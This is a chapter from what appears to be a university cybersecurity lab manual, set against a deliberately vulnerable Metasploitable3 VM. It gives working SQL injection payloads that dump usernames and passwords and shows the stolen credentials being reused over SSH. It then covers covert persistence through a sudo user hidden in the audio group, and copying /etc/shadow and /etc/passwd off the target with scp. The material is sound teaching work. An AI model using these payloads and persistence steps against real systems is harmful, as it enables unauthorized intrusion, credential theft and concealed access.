47 Gaining Access – SQL Injection

This section will show students the basics of performing a simple SQL injection. Prior knowledge of SQL is not required since we are walking you through the attack in a “monkey see, monkey do” fashion.  This chapter provides experience in exploiting SQL database vulnerabilities.  However, extensive SQL knowledge is necessary to conduct this type of attack against non-prescribed targets.

Learning Objectives

• Learn the basics of SQL Injection

Prerequisites

• Ch 42 Building the Baseline Network

Deliverables

• 4 Screenshots are needed to earn credit for this exercise:
  • Successful SQL injection getting usernames and passwords
  • Using usernames and passwords to SSH into the target system
  • The addition of a new SUDO user as demonstrated by SSH into the target system
  • Showing the copy of the target’s shadow file and passwd file in the local (Kali) Downloads folder

Resources

• Deepak Prasad – “DWVA SQL Injection Exploitation Explained (Step-by-Step)” – https://www.golinuxcloud.com/dvwa-sql-injection/
• Murari, G. “Exploiting the Vulnerabilities on Metasloit3 (sic) (Ubuntu) Machine Using Metasploit Framework and Methodologies“, Dec 2020, Concordia University of Edmonton

Contributors and Testers

• Raechel Ferguson, Cybersecurity Student, ERAU-Prescott
• Justin La Zare, Cybersecurity Student, ERAU-Prescott
• Jacob M. Christensen, Cybersecurity Student, ERAU-Prescott

1. Start with the attack environment from Chapter 42 and get it up and running
2. Find the IP address of the Metasploitable3-Linux VM using Nmap. In our example, we discovered the Metasploitable3-Linux VM using the this will be 200.200.200.8
   

   

3. We can see that MySQL is running on port 3306, likely supporting a website.
4. Open Firefox on the Kali VM. Go to the address:

   http://200.200.200.8

   

5. Click on payroll_app.php
   

   

6. Log in with the Username admin and the Password admin.
   

   

7. We got in….sort of.  We can see a table trying to display 4 fields, presumably from the MySQL database.  We can work with that.

1. With this information, return to the Payroll sign-on and try some injection.  In the username field, type:

   ‘ OR 1=1 #

2. On the backend, the following SQL query may get executed:

   SELECT username, first_name, last_name, salary FROM users WHERE username = ‘$user’ and password = ‘$pass’;

3. Replacing the $user and $pass variables with the inputs, we get the following query:

   SELECT username, first_name, last_name, salary FROM users WHERE username = ‘‘ OR 1=1 #‘ and password = ”;

4. This means, “Hey SQL, give me all records in the table where either the username field is blank (as the apostrophe ends the string) or if 1 equals 1.” Since 1 is always equal to 1, this query will retrieve all of the records within the table. The check against the password is never seen because the # symbol comments everything afterward and is not executed.
   

   

5. You can see that we got more information this way.  We can assume that data property names in the database table are named username, first_name, last_name, and salary
6. But we don’t know what version of SQL we are using.  Knowing this information will help us develop our next SQL injection attack.  Type:

   ‘ UNION SELECT null, null, null, @@version #

7. This SQL command is like before.  Close out the username string (‘).  Join (UNION) the response of a new command. Don’t print in the username column (null), the first name column (null), or the last name column (null). In the fourth column, however, print the (@@version) version of the table. Ignore the rest of the query (#). This gives us a response of:
   

   

   NOTE: Since the web application expects to print four output columns, the command could also easily be ‘UNION SELECT @@version, null, null, null#’, which would still give us the information. However, ‘UNION SELECT @@version #’ would not because, although the database would happily return the information we seek, the web application will error. This is because the web application will be trying to reference and display columns that do not exist.

8. We know from the login page that each user must have a password.  Why else would the webpage ask for it?  So, let’s take this speculation further and try the following

   ‘ UNION SELECT username, password, null, null FROM users #

9. Since we are appending the results, the information may appear after the existing information:
   

   

10. Remember, people are predictable.  Let’s see if they refused their names and passwords for system access.  In your Kali box, try to SSH into the target machine by typing:

    > ssh leia_organa@200.200.200.8

    

11. We got in. It is rarely this easy, but it has happened to the authors in real life.  It is always worth checking

1. At Princess Leia’s login, type groups:
   

   

2.  Ok, this never happens.  Generally, you have to try dozens, hundreds, or even thousands of usernames and passwords to find someone with SUDO rights. On a real system, I would think it was a honeypot.  But the target is there for our practice, so let’s go with it
3. After gaining access to a system, the next thing we must do is establish persistence.  So, let’s create a new user with sudo access.  Type

   > sudo adduser student

   

4. We need to add this user to a group.  Let’s not be obvious, so choose a group that seems innocuous. Type

   > sudo cat /etc/group

   

5. Choose a group that appears innocuous. The audio group looks good.  Now add this new user to the audio group by typing

   > sudo usermod -aG audio student

6. If Princess Leia ever changes her password, we (student) will still have access, and we can log into the target machine anytime we want.
7. Now modify the sudo permissions so ‘student’ has sudo access.  Edit the Sudoers file by typing.

   > sudo visudo

8. Add the group ‘audio’ to have SUDO access.  This means members can run all commands as all groups (including sudo), and this rule applies to all commands run by members of the group

   %audio ALL=(ALL:ALL) ALL

   

9. Write out (save) ^O and exit ^X to save the settings.
10. Exit the login of Princess Leia by typing.

    > exit

11. Now SSH into the target machine with the new login account student.

    > ssh student@200.200.200.8

12. Navigate to the configuration files directory.

    > cd /etc

13. Change the permissions on the files that contain user information (passwd) and password hashes (shadow) we want to copy.

    > sudo chmod 777 passwd

    > sudo chmod 777 shadow

14. You can now close the SSH login by typing.

    > exit

15. You can now copy these files from the target machine to the Kali machine for evaluation later.
16. In the Kali machine, navigate to the Downloads directory.

    > cd ~/Downloads

17. Now use SCP (secure copy) to remotely copy the files.

    > scp student@200.200.200.8:/etc/passwd target_passwd

    > scp student@200.200.200.8:/etc/shadow target_shadow

18. Ensure the files are copied by typing.

    > ls

    

End of Lab

No Figures in this Chapter